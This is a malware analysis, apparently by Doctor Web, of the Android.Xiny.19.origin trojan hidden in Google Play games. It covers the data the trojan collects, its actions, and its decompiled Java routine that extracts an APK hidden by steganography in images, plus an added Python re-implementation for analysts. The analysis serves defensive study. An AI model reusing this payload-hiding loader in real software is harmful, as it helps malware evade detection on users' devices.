SHA1: 6895c3258031b5750ce19aa7b67dd92db313e1be

It is a Trojan for Android devices that is embedded into various games published on Google Play.

Android.Xiny.19.origin sends the following information to the command and control server:

IMEI identifier

IMSI identifier

Information about the mobile operator

Presence of a memory card in a device

Country

Language

MAC address

Version of the operating system

Package name and version of the application that the Trojan is incorporated into

Presence of the malicious application in the system folder

The Trojan can execute the following actions:

Displays annoying advertisements

Downloads applications and prompts the user to install various software

Installs and deletes programs if root access is available on a device

Launches arbitrary apk files hidden in images received from the C&C server

The apk files are launched as follows: Android.Xiny.19.origin downloads from the server a specially crafted image in which the file is hidden by means of steganography. The Trojan then extracts the apk file from the image using the following algorithm:

package com.wch.c_direct.encrypt.logic;

import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
import com.wch.c_direct.logic.a;
import java.io.InputStream;
import java.util.Arrays;

public final class BitmapDecryptor {
    public static byte[] decrypt(InputStream inputStream) {
        int i5;
        int i = 4;   // size of the length header in bytes
        int i1 = 8;  // the header is 8 nibbles (4 bits each), i.e. 4 bytes
        a.a();
        Bitmap bitmap0 = BitmapFactory.decodeStream(inputStream);
        bitmap0.setHasAlpha(true);

        // Pass 1: read the 8 header nibbles. Every pixel carries three nibbles,
        // the low 4 bits of its R, G and B channels; pixels are walked row by row from (0,0).
        byte[] buffer1 = new byte[i1];
        int i2 = 0;  // nibble index
        int i3 = 0;  // pixel y
        int i4 = 0;  // pixel x
        while(i2 < buffer1.length) {
            i5 = bitmap0.getPixel(i4, i3);
            buffer1[i2] = ((byte)(i5 >> 16 & 15));          // low nibble of R
            if(i2 + 1 < i1) {
                buffer1[i2 + 1] = ((byte)(i5 >> 8 & 15));   // low nibble of G
            }
            if(i2 + 2 < i1) {
                buffer1[i2 + 2] = ((byte)(i5 & 15));        // low nibble of B
            }
            ++i4;
            if(i4 == bitmap0.getWidth()) {
                ++i3;
                i4 = 0;
            }
            i2 += 3;
        }

        // The packed header is a big-endian 32-bit total length (header bytes included).
        byte[] buffer2 = BitmapDecryptor.a(buffer1);
        i2 = 0;
        i3 = 0;
        while(i2 < i) {
            i3 = i3 << 8 | buffer2[i2] & 255;
            ++i2;
        }

        // Pass 2: re-read the whole stream from (0,0), two nibbles per byte of the total length.
        buffer1 = new byte[i3 * 8 / 4];
        i2 = 0;
        i3 = 0;
        i4 = 0;
        while(i2 < buffer1.length) {
            i5 = bitmap0.getPixel(i4, i3);
            buffer1[i2] = ((byte)(i5 >> 16 & 15));
            if(i2 + 1 < buffer1.length) {
                buffer1[i2 + 1] = ((byte)(i5 >> 8 & 15));
            }
            if(i2 + 2 < buffer1.length) {
                buffer1[i2 + 2] = ((byte)(i5 & 15));
            }
            ++i4;
            if(i4 == bitmap0.getWidth()) {
                ++i3;
                i4 = 0;
            }
            i2 += 3;
        }

        byte[] decrypted = BitmapDecryptor.a(buffer1);
        bitmap0.recycle();
        // Drop the 4-byte length header; the remainder is the hidden apk file.
        return Arrays.copyOfRange(decrypted, i, decrypted.length);
    }

    // Packs each pair of nibbles into one byte, high nibble first (inBuffer[i*2], inBuffer[i*2+1]).
    private static byte[] a(byte[] inBuffer) {
        a.a();
        byte[] outBuffer = new byte[inBuffer.length / 2];
        int i;
        for(i = 0; i < outBuffer.length; ++i) {
            int i1;
            for(i1 = 0; i1 < 2; ++i1) {
                outBuffer[i] = ((byte)(outBuffer[i] << 4 | inBuffer[i * 8 / 4 + i1]));
            }
        }
        return outBuffer;
    }
}

After that, the malicious application loads the extracted file into the memory of the infected device using the DexClassLoader class.
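For analysts who need to recover the hidden file from a captured image, the extraction routine above is re-implemented here as an added stand-alone Python example; it is not the Trojan's code and not Doctor Web's. It assumes the image is supplied as a width plus a row-major list of 0xRRGGBB pixel integers (with Pillow, that list can be built from Image.open(path).convert("RGB")), so it needs no Android or imaging library, and the 4x2 sample image at the bottom is a constructed fixture, not a real sample. It also fails cleanly on the two inputs that would crash the original code: a length field that is smaller than its own header, and a length that asks for more nibbles than the image holds.

```python
"""Stand-alone re-implementation of the nibble-per-channel extraction performed
by Android.Xiny.19.origin's BitmapDecryptor, for offline analysis of a captured
image. Assumption: the image is modelled as (width, row-major list of 0xRRGGBB
ints); no Android or imaging library is needed."""
from typing import List

HEADER_BYTES = 4        # big-endian total length, header included (the `i` in decrypt())
NIBBLES_PER_PIXEL = 3   # low 4 bits of R, G and B


def pack_nibbles(nibbles: List[int]) -> bytes:
    """Equivalent of BitmapDecryptor.a(): two nibbles -> one byte, high nibble first."""
    out = bytearray(len(nibbles) // 2)
    for i in range(len(out)):
        out[i] = ((nibbles[2 * i] & 0xF) << 4) | (nibbles[2 * i + 1] & 0xF)
    return bytes(out)


def read_nibbles(pixels: List[int], width: int, count: int) -> List[int]:
    """Walk the pixels row by row from (0, 0), taking the low nibble of R, G and B
    of each pixel (i5 >> 16 & 15, i5 >> 8 & 15, i5 & 15) until `count` nibbles are
    collected. Raises instead of reading past the image, where the Trojan's own
    code would get an exception from Bitmap.getPixel()."""
    if width <= 0 or len(pixels) % width:
        raise ValueError("pixel list does not form a width x height image")
    if count > NIBBLES_PER_PIXEL * len(pixels):
        raise ValueError(f"need {count} nibbles but the image holds only "
                         f"{NIBBLES_PER_PIXEL * len(pixels)}")
    nibbles: List[int] = []
    x = y = 0
    while len(nibbles) < count:
        p = pixels[y * width + x]
        for shift in (16, 8, 0):          # R, G, B in that order
            if len(nibbles) < count:
                nibbles.append((p >> shift) & 0xF)
        x += 1
        if x == width:
            x, y = 0, y + 1
    return nibbles


def extract_payload(pixels: List[int], width: int) -> bytes:
    """Mirror of decrypt(): pass 1 reads 8 nibbles -> 4-byte length `total`;
    pass 2 re-reads total*2 nibbles from (0, 0) and drops the header bytes."""
    header = pack_nibbles(read_nibbles(pixels, width, 2 * HEADER_BYTES))
    total = int.from_bytes(header, "big")
    if total < HEADER_BYTES:
        raise ValueError(f"length field {total} is shorter than its own header")
    stream = pack_nibbles(read_nibbles(pixels, width, 2 * total))
    return stream[HEADER_BYTES:]


def looks_like_dex(payload: bytes) -> bool:
    """Cheap triage check: a DEX file starts with the magic 'dex\\n' followed by a version."""
    return payload[:4] == b"dex\n"


# Constructed fixture (not a real sample): a 4x2 image with cover colour 0x7F7F7F
# whose low nibbles carry the stream
#   00 00 00 0B | 64 65 78 0A 30 33 35   (length 11 = 4 header + 7 payload bytes)
# i.e. nibbles 0,0,0,0,0,0,0,B,6,4,6,5,7,8,0,A,3,0,3,3,3,5 plus two padding zeros,
# three per pixel in R,G,B order.
SAMPLE_WIDTH = 4
SAMPLE_PIXELS = [
    0x707070, 0x707070, 0x707B76, 0x747675,
    0x777870, 0x7A7370, 0x737373, 0x757070,
]

if __name__ == "__main__":
    hidden = extract_payload(SAMPLE_PIXELS, SAMPLE_WIDTH)
    print(hidden, looks_like_dex(hidden))
```

Because the second pass starts again at pixel (0, 0), the length field always counts itself; an image whose header decodes to less than 4 is malformed rather than empty, which is why that case raises. The recovered bytes can be hashed and checked against the DEX magic before any further analysis of the dropped file.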
